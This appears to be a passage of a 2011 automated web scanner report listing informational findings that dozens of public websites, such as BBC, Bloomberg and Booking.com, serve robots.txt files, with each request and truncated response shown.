Server: Apache/2.0.63 (Unix)
Last-Modified: Wed, 02 Mar 2011 09:09:19 GMT
ETag: "a7cd60-151-49d7c44958dc0"
Accept-Ranges: bytes
Content-Length: 337
Cache-Control: max-age=172800
Expires: Mon, 04 Apr 2011 14:05:44 GMT
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/plain; charset=ISO-8859-1

User-agent: *
Disallow: /search/
Disallow: /coreg/
Disallow: /gcoreg/
Disallow: /cart/
Disallow: /cartHandler/
Disallow: /include/
Disallow: /checkout/
Disallow: /images/
Disallow: /emailFriend/
Disal
...[SNIP]...

24.92. http://www.bbc.co.uk/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.bbc.co.uk

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/plain
Date: Sat, 02 Apr 2011 12:43:25 GMT
Keep-Alive: timeout=4, max=199
Accept-Ranges: bytes
Connection: close
Last-Modified: Wed, 16 Feb 2011 16:13:09 GMT
Content-Length: 7594

User-agent: Googlebot
Disallow: /iplayer/episode/*?from=r*
Disallow: /iplayer/cy/episode/*?from=r*
Disallow: /iplayer/gd/episode/*?from=r*
Sitemap: http://www.bbc.co.uk/news_sitemap.xml
Sitemap: http:
...[SNIP]...

24.93. http://www.bbt.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbt.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.bbt.com

Response

HTTP/1.1 200 OK
Set-Cookie: bbt=52f3b26952f3b2fabaeebafa; path=/
accept-ranges: bytes
connection: close
content-length: 803
content-type: text/plain
date: Sat, 02 Apr 2011 13:41:55 GMT
etag: "80b65714957eca1:17bf"
last-modified: Wed, 16 Dec 2009 21:16:49 GMT
p3p: CP="NON UNI CUR OTPi OUR NOR"
x-powered-by: ASP.NET
Set-Cookie: PD_STATEFUL_b57fafc4-99a4-11da-83e0-00f81800e002=%2Fbbt; Path=/

# The following files were requested to be excluded from search engines including our internal engine
# BB&T Site Server

User-agent: *
Disallow: /adminasp/
Disallow: /about/cra/goodcompanynewsle
...[SNIP]...

24.94. http://www.bearshare.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bearshare.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.bearshare.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Thu, 01 Jul 2010 11:55:22 GMT
ETag: "5c-25255e80"
Accept-Ranges: bytes
Content-Length: 92
Content-Type: text/plain
Date: Sat, 02 Apr 2011 13:32:37 GMT
Connection: close

User-Agent: *
Disallow: /helpfiles/
Disallow: /home/
Disallow: /all-music/private/
Allow: /

24.95. http://www.bedbathandbeyond.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bedbathandbeyond.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.bedbathandbeyond.com

Response

HTTP/1.1 200 OK
Last-Modified: Wed, 17 Nov 2010 11:15:46 GMT
Server: Microsoft-IIS/6.0
X-Who-O: AS7
X-Powered-By: ASP.NET
Content-Type: text/plain
ETag: "pv3c3e4f9b26166751f3a5e27acc629b3e"
Expires: Sat, 02 Apr 2011 21:22:08 GMT
Cache-Control: public, s-maxage=604800, max-age=28800
X-PvInfo: [S11101.C5517.A65477.RA0.G1011C.UB7BEBFDD].[OT/plaintext.OG/documents]
Vary: Accept-Encoding
Accept-Ranges: bytes
X-Who: 2004
Connection: close
Date: Sat, 02 Apr 2011 13:36:11 GMT
Age: 843
Content-Length: 818
X-Who-L: LB2001
Set-Cookie: BBBDC=WDC1;path=/;

User-agent: *
Disallow: /showCart.asp
Disallow: /cgi-bin
Disallow: /regGiftRegistry.asp
Disallow: /regProduct.asp
Disallow: /prodNotAvailable.asp
Disallow: /prodNotAvailableCirc.asp
Disallow: /
...[SNIP]...

24.96. http://www.beezid.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.beezid.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.beezid.com

Response

HTTP/1.1 200 OK
Last-Modified: Tue, 09 Feb 2010 18:12:00 GMT
ETag: "b0a798-10c-47f2edaa03c00"
Content-Type: text/plain; charset=UTF-8
Content-Length: 268
Server: Apache
Vary: Accept-Encoding
Date: Sat, 02 Apr 2011 14:02:48 GMT
Connection: close

User-agent:    *
Disallow: /updater.php
Disallow: /auctions/updater/
Disallow: /js/
Disallow: /cjs/
Disallow: /unAuto/
Disallow: /auctions/pin/
Disallow: /reminders/setReminder/
Disallow: /auctions/revea
...[SNIP]...

24.97. http://www.bellaonline.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bellaonline.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.bellaonline.com

Response

HTTP/1.1 200 OK
Content-Length: 156
Content-Type: text/plain
Last-Modified: Fri, 21 Mar 2008 03:13:10 GMT
Accept-Ranges: bytes
ETag: "b062227e18bc81:86c"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:57:48 GMT
Connection: close

User-agent: Dllbot
Disallow: /

User-agent: *
Disallow: /members
Disallow: /admin
Disallow: /content
Disallow: /ebooks/files
Disallow: /review/files

24.98. http://www.bellsouth.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bellsouth.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.bellsouth.com

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 02 Apr 2011 13:31:40 GMT
Content-length: 58
Content-type: text/plain
Last-modified: Wed, 22 Aug 2007 13:25:45 GMT
Accept-ranges: bytes
Connection: close

User-agent: *
Disallow: /stats/
Disallow: /consumer/atlas/

24.99. http://www.bestwestern.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bestwestern.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.bestwestern.com

Response

HTTP/1.0 200 OK
Content-Length: 54
Content-Type: text/plain
Last-Modified: Tue, 10 Mar 2009 21:21:33 GMT
Accept-Ranges: bytes
ETag: "dda8d82fc6a1c91:2994"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:56:43 GMT
Connection: close

User-agent: *
Disallow: /bwmail/
Disallow: /eandt/

24.100. http://www.bettycrocker.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bettycrocker.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.bettycrocker.com

Response

HTTP/1.0 200 OK
Cache-Control: max-age=86400
Content-Type: text/plain
Last-Modified: Wed, 09 Mar 2011 11:40:51 GMT
Accept-Ranges: bytes
ETag: "3c253cd74edecb1:0"
Server: Microsoft-IIS/7.0
Content-Length: 300
Date: Sat, 02 Apr 2011 13:45:49 GMT
Connection: close

...User-agent: *
Disallow: /Register
Disallow: /login
Disallow: /search
Disallow: /*.axd
Disallow: /CMSTemplates
Disallow: /cmstemplates
Disallow: /Controls
Disallow: /controls
Disallow: /Pri
...[SNIP]...

24.101. http://www.beyond.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.beyond.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.beyond.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Tue, 01 Mar 2011 16:09:11 GMT
Accept-Ranges: bytes
ETag: "8aa2c402bd8cb1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 14:02:59 GMT
Connection: close
Content-Length: 364

User-Agent: *

Disallow: /CC/
Disallow: /Common/
Disallow: /EMP/Action/
Disallow: /EMP/Form/
Disallow: /JS/Form/
Disallow: /cc/
Disallow: /common/
Disallow: /emp/action/
Disallow: /emp/form/
...[SNIP]...

24.102. http://www.bhphotovideo.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bhphotovideo.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.bhphotovideo.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Sat, 02 Apr 2011 03:03:16 GMT
ETag: "491-4d9691f4"
Cache-Control: no-cache
Date: Sat, 02 Apr 2011 13:58:08 GMT
Content-Length: 1169
Connection: close

User-agent: *
Disallow: /c/search*
Disallow: /search*
Disallow: /federal
Disallow: */edu
Disallow: /c/find/
Disallow: /impact/
Disallow: /find/organizational-sales.jsp*
Disallow: /find/gsa.jsp
Disallo
...[SNIP]...

24.103. http://www.biblegateway.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.biblegateway.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.biblegateway.com

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Sat, 02 Apr 2011 13:34:50 GMT
Content-Type: text/plain; charset=UTF-8
Connection: close
Vary: Accept-Encoding
Last-Modified: Thu, 31 Mar 2011 20:34:46 GMT
ETag: "c0b37-8f-3957a580"
Accept-Ranges: bytes
Content-Length: 143

User-agent: *
Disallow: /cgi-bin/guestbook
Disallow: /feedback
Disallow: /share
Sitemap: http://www.biblegateway.com/site-map/map-index.xml

24.104. http://www.bigfishgames.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bigfishgames.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.bigfishgames.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:39:17 GMT
Server: Apache
Last-Modified: Wed, 01 Dec 2010 23:56:06 GMT
Accept-Ranges: bytes
Content-Length: 458
Vary: Accept-Encoding
Keep-Alive: timeout=15, max=9921
Connection: Keep-Alive
Content-Type: text/plain
Set-Cookie: NSC_tjuftqfd_op_bgtsd=ffffffff094e0d0a45525d5f4f58455e445a4a423660;expires=Sat, 02-Apr-2011 05:42:06 GMT;path=/;httponly

User-agent: *
Disallow: /_include/
Disallow: /affiliate/
Disallow: /cgi-bin/
Disallow: /css/
Disallow: /javascript/
Disallow: /php/
Disallow: /toolbar/barserver.php
Disallow: /toolbar/options.
...[SNIP]...

24.105. http://www.bigpoint.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bigpoint.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.bigpoint.com

Response

HTTP/1.0 200 OK
Date: Sat, 02 Apr 2011 13:54:03 GMT
X-XLB-Cache: hit
Content-Type: text/plain; charset=UTF-8
Content-Length: 55
Expires: Sat, 02 Apr 2011 14:01:32 GMT
Last-Modified: Sat, 02 Apr 2011 13:41:32 GMT
Connection: Close

# www.bigpoint.com robots.txt

User-agent: *
Disallow:

24.106. http://www.bizjournals.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bizjournals.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.bizjournals.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:39:05 GMT
Server: Apache
ServerID: 5
Vary: Accept-Encoding
Content-Length: 3065
Connection: close
Content-Type: text/plain

User-agent: YahooSeeker/CafeKelsa
Disallow: /

User-agent: dotbot
Disallow: /

User-agent: Yandex
Disallow: /

User-agent: Mail.Ru/1.0
Disallow: /

User-agent: blp_bbot
Disallow: /

User-agent: Slurp

...[SNIP]...

24.107. http://www.bizrate.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bizrate.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.bizrate.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: trafficSourceDebugParam=""; Domain=.bizrate.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
P3P: CP="NON DSP ADM DEV PSD TAI OUR IND STP PRE NAV UNI"
Set-Cookie: yes_email_invite=invite3; Domain=.bizrate.com; Expires=Sun, 03-Apr-2011 12:44:12 GMT; Path=/
Pragma:
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control:
Set-Cookie: sessionid=620512693270107052; Domain=.bizrate.com; Expires=Sun, 03-Apr-2011 12:44:12 GMT; Path=/
Set-Cookie: br=13017482526116310739302050102029256; Domain=.bizrate.com; Expires=Tue, 30-Mar-2021 12:44:12 GMT; Path=/
Set-Cookie: _data=_time%3A%3Astart_time%3D1301748252%3Btimestamp%3D1301748252%7Ctracker%3A%3Ahtcnt%3D1%3Brf%3Dwlk; Domain=.bizrate.com; Expires=Sun, 03-Apr-2011 12:44:12 GMT; Path=/
Set-Cookie: p13n_id=0001afa1ee8c3d9c47d1b3c2fcfb54dd823e; Domain=.bizrate.com; Expires=Tue, 30-Mar-2021 12:44:12 GMT; Path=/
Set-Cookie: rng=8685133; Domain=.bizrate.com; Expires=Sun, 03-Apr-2011 12:44:12 GMT; Path=/
Set-Cookie: sosurvey_response=none%3A%3Afalse%3A%3Afalse%3A%3Ahttp%3A%2F%2Fevalus.bizrate.com%2Fwix%2Fp1648730.aspx%3Fbr%3D13017482526116310739302050102029256%26session_id%3D620512693270107052%26rf_code%3Dwlk%26brand%3DBR%26country_code%3DUS%26pageToken%3D2D; Domain=.bizrate.com; Expires=Mon, 02-May-2011 12:44:12 GMT; Path=/
Accept-Ranges: bytes
ETag: W/"2971-1297963980000"
Last-Modified: Thu, 17 Feb 2011 17:33:00 GMT
Content-Type: text/plain;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 2971
Date: Sat, 02 Apr 2011 12:44:12 GMT
Connection: close

User-Agent: *
Disallow: /rd
Disallow: /rd2
Disallow: /mybizrate/
Disallow: /color_bumper.xpml
Disallow: /RetailStores
Disallow: /ProductReserve

User-Agent: Googlebot
Disallow: /rd
Disallow: /rd2
Disa
...[SNIP]...

24.108. http://www.blackberry.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.blackberry.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.blackberry.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:38:46 GMT
Server: Apache
Last-Modified: Tue, 08 Feb 2011 16:22:39 GMT
ETag: "11e82ea-1ca-49bc7c1cbd1c0"
Accept-Ranges: bytes
Content-Length: 458
Connection: close
Content-Type: text/plain

#Robots.txt for blackberry.com

#blackberry.com
User-agent: *
Disallow: /sporders/
Disallow: /spsales/
Disallow: /test/
Disallow: /partnersupport/
Disallow: /imsupport/
Disallow: /emailers/ownerlounge
...[SNIP]...

24.109. http://www.blackboard.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.blackboard.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.blackboard.com

Response

HTTP/1.1 200 OK
Content-Length: 129
Content-Type: text/plain
Last-Modified: Tue, 11 Jan 2011 18:07:08 GMT
Accept-Ranges: bytes
ETag: "58b7825cbab1cb1:e82"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:37:04 GMT
Connection: close

User-agent: *

Disallow: /CMSDesk

Disallow: /CMSSiteManager
Disallow: /Collateral
Disallow: /Archive
Disallow: /Newsletters

24.110. http://www.blackplanet.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.blackplanet.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.blackplanet.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:58:09 GMT
Server: Apache
X-Powered-By: PHP/5.2.4
Page-Name: /robots.txt
Set-Cookie: user_guid=d41d8cd98f00b204e9800998ecf8427e.4d972b719b6da5.28857868; path=/
Cache-Control: no-cache, no-store, private
Content-Length: 1450
Keep-Alive: timeout=120, max=496
Connection: Keep-Alive
Content-Type: text/plain; charset=utf-8

# "Any empty [Disallow] value, indicates that all URLs can be retrieved.
# At least one Disallow field needs to be present in a record."

User-agent: Fasterfox
Disallow: /

User-Agent: OmniExplorer_Bo
...[SNIP]...

24.111. http://www.blastro.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.blastro.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.blastro.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:26:25 GMT
Server: Apache/2.2.16 (Unix)
Last-Modified: Tue, 25 Nov 2008 17:47:45 GMT
ETag: "b6897-510-45c871be25240"
Accept-Ranges: bytes
Content-Length: 1296
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

#For Google Adsense and Adwords Quality
User-agent: Mediapartners-Google
Disallow: /email/*
Disallow: /ms_asx/*
Disallow: /rmsmail/*
Disallow: /rate.php*
Disallow: /login.php*
Disallow: /titleb
...[SNIP]...

24.112. http://www.blockbuster.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.blockbuster.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.blockbuster.com

Response

HTTP/1.0 200 OK
Content-Length: 85
Content-Type: text/plain; charset=UTF-8
X-Powered-By: Servlet/2.5 JSP/2.1
X-N: S
Cache-Control: max-age=86400
Date: Sat, 02 Apr 2011 13:34:58 GMT
Connection: close

User-agent: *
Disallow: /queuemgmt/
Disallow: /aff/*
Disallow: /stores/storelocator/

24.113. http://www.blogtv.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.blogtv.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.blogtv.com

Response

HTTP/1.1 200 OK
Content-Length: 46
Content-Type: text/plain
Last-Modified: Wed, 13 Jun 2007 15:06:17 GMT
Accept-Ranges: bytes
ETag: "f9fd8c64ccadc71:0"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 14:00:23 GMT
Connection: close

# robots.txt

User-agent: *
Disallow:


24.114. http://www.bloomberg.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bloomberg.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.bloomberg.com

Response

HTTP/1.0 200 OK
Server: Sun-Java-System-Web-Server/7.0
Content-Type: text/plain
Last-Modified: Tue, 22 Jun 2010 21:49:45 GMT
ETag: W/"d7-4c212ff9"
Cache-Control: max-age=900
Expires: Sat, 02 Apr 2011 13:38:23 GMT
Date: Sat, 02 Apr 2011 13:23:23 GMT
Content-Length: 215
Connection: close

User-agent: *
User-agent: Mediapartners-Google*
Disallow:
Sitemap: http://www.bloomberg.com/sitemap_index.xml
Sitemap: http://www.bloomberg.com/sitemap_news.xml
Sitemap: http://www.bloomberg.com/sit
...[SNIP]...

24.115. http://www.bls.gov/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bls.gov
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.bls.gov

Response

HTTP/1.1 200 OK
Content-Length: 452
Content-Type: text/plain
Last-Modified: Wed, 03 Dec 2008 21:10:56 GMT
Accept-Ranges: bytes
ETag: "0b0caa18b55c91:fc9"
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR NID CURaADMa OUR STP"
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:52:51 GMT
Connection: close

User-agent: archive.org_bot
Disallow:/include
Disallow:/scripts
Disallow:/oep
Disallow:/crs
Disallow:/_private
Disallow:/iisadmin
Disallow:/srchadm
Disallow:/fax
Disallow:/idcf
Disallow:/*pr
...[SNIP]...

24.116. http://www.bluemountain.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bluemountain.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.bluemountain.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:05:38 GMT
Server: Apache
Last-Modified: Thu, 16 Dec 2010 13:30:55 GMT
ETag: "2720bc6-8fc-103301c0"
Accept-Ranges: bytes
Content-Length: 2300
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /addaphoto/
Disallow: /cards/
Disallow: /cares/
Disallow: /channel/
Disallow: /click-or-treat/
Disallow: /contest/chatboard/
Disallow: /desktop/
Disallow: /ecards/addap
...[SNIP]...

24.117. http://www.blurtit.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.blurtit.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.blurtit.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:26:13 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Fri, 01 Apr 2011 14:07:31 GMT
ETag: "2100033-6b8-49fdbee450ec0"
Accept-Ranges: bytes
Content-Length: 1720
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: Googlebot
Disallow: /search/
Disallow: /ads/
Disallow: /me/
Disallow: /test/
Disallow: /ads/
Disallow: /answer.php
Disallow: /rateit.php
Disallow: /lander.php
Disallow: /listings.
...[SNIP]...

24.118. http://www.bnet.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bnet.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.bnet.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:32:30 GMT
Server: Apache
Last-Modified: Fri, 01 Apr 2011 19:28:50 GMT
Accept-Ranges: bytes
Content-Length: 2091
Keep-Alive: timeout=15, max=996
Connection: Keep-Alive
Content-Type: text/plain

User-agent: Googlebot-Mobile
Disallow: /
User-agent: YahooSeeker/M1A1-R2D2
Disallow: /
User-agent: MSNBOT_Mobile
Disallow: /

User-agent: *
Disallow: /adlog/
Disallow: /Ads/
Disallow: /av/
Disallow: /
...[SNIP]...

24.119. http://www.bodybuilding.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bodybuilding.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.bodybuilding.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Wed, 17 Mar 2010 15:38:16 GMT
ETag: "32ed15-75-48200e72b42d6"
Content-Type: text/plain
Date: Sat, 02 Apr 2011 13:38:18 GMT
Content-Length: 117
Connection: close

User-agent: *
Disallow: /teen/
Disallow: /bodybuilders/
Disallow: /lean/
Disallow: /store/bsn/nitrix_commercial.flv


24.120. http://www.boingboing.net/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.boingboing.net
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.boingboing.net

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:53:06 GMT
Server: Apache/2.2
Last-Modified: Tue, 20 Apr 2004 16:21:23 GMT
Accept-Ranges: bytes
Content-Length: 33
Keep-Alive: timeout=60, max=988
Xonnection: Xeep-Alive
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /cgi-bin

24.121. http://www.boldchat.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.boldchat.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.boldchat.com

Response

HTTP/1.0 200 OK
Server: Resin/2.1.13
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM", policyref="http://images.boldchat.com/w3c/p3p.xml"
ETag: "AAAAS8DZHlY"
Last-Modified: Tue, 29 Mar 2011 20:53:27 GMT
Content-Type: text/plain
Content-Length: 1027
Date: Sat, 02 Apr 2011 14:19:21 GMT

User-agent: *
Disallow: /chat/visitor.jsp
Disallow: /live_chat_software/support/auth/
Disallow: /live_chat_software/pa_sw_offer/
Disallow: /live_chat_software/bootcamp/
Disallow: /live_chat_software/m
...[SNIP]...

24.122. http://www.booking.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.booking.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.booking.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:33:40 GMT
Server: Apache
Cache-Control: max-age=259200
Expires: Tue, 05 Apr 2011 13:33:40 GMT
Last-Modified: Wed, 16 Mar 2011 08:39:02 GMT
ETag: "205-4d807726"
Accept-Ranges: bytes
Content-Length: 517
Keep-Alive: timeout=5, max=95
Connection: close
Content-Type: text/plain

User-agent: psbot
Disallow: /
User-agent: TurnitinBot
Disallow: /
User-agent: NPBot-1/2.0
Disallow: /
User-agent: NPBot
Disallow: /
User-agent: *
Disallow: /honing.html
Disallow: /photo.html
Disallow:
...[SNIP]...

24.123. http://www.bookrags.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bookrags.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.bookrags.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:34:17 GMT
Last-Modified: Fri, 30 Jul 2010 22:43:13 GMT
ETag: "200c5-2d0-48ca2937c84ec"
Accept-Ranges: bytes
Content-Length: 720
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain
Set-Cookie: TS2aad59=daba6359fe611af0250e010c4b90837a4ebfee64a37c73d94d97279a; Path=/
Set-Cookie: TS2aad59_28=bcfb1212b0341682932e9d51a063e88f4ebfee64a37c73d90000000000000000004d972799c4df4a8d26d97ac5; Path=/

Sitemap: http://www.bookrags.com/sitemap-index.xml

User-agent: Googlebot
Disallow: /s/
Disallow: /sk/
Disallow: /php/
Disallow: /essaygrade/
Disallow: /essayfree/
Disallow: /printfriendly/
Disallow:
...[SNIP]...

24.124. http://www.borders.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.borders.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.borders.com

Response

HTTP/1.0 200 OK
Server: IBM_HTTP_Server
Last-Modified: Mon, 16 Aug 2010 10:07:05 GMT
ETag: "1bb-fe984440"
Content-Type: text/plain
Date: Sat, 02 Apr 2011 13:32:22 GMT
Content-Length: 443
Connection: close

User-agent: *
Disallow: /online/store/OrderItemDisplay
Disallow: /online/store/OrderItemUpdate
Disallow: /online/store/OrderItemAdd
Disallow: /online/store/OrderItemDelete
Disallow: /online/store/Shop
...[SNIP]...

24.125. http://www.boston.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.boston.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.boston.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:42:58 GMT
Server: Apache/2.2.10 (Unix) modpath/0.4 PHP/5.2.6
Last-Modified: Mon, 21 Jun 2010 19:32:33 GMT
Accept-Ranges: bytes
Content-Length: 96
Served-By: alechill
Keep-Alive: timeout=30
Connection: close
Content-Type: text/plain
Set-Cookie: bcpage=0;expires=Sun, 06-Mar-2016 13:42:56 GMT;path=/;domain=boston.com;

User-Agent: *
Sitemap: http://www.boston.com/Sitemap_index.xml
Disallow: /newsprojects/widgets/

24.126. http://www.brainyquote.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.brainyquote.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.brainyquote.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:31:31 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/1.0.0d
Last-Modified: Fri, 01 Oct 2010 18:41:43 GMT
ETag: "16dc52e-54-491928bc467c0"
Accept-Ranges: bytes
Content-Length: 84
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain


User-agent: Mediapartners-Google*
Disallow:

User-agent: ia_archiver
Disallow: /

24.127. http://www.bravotv.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bravotv.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.bravotv.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.3 (Red Hat)
X-Varnish: 1345775487
X-Varnish: 190097180 187967772
Content-Type: text/plain; charset=UTF-8
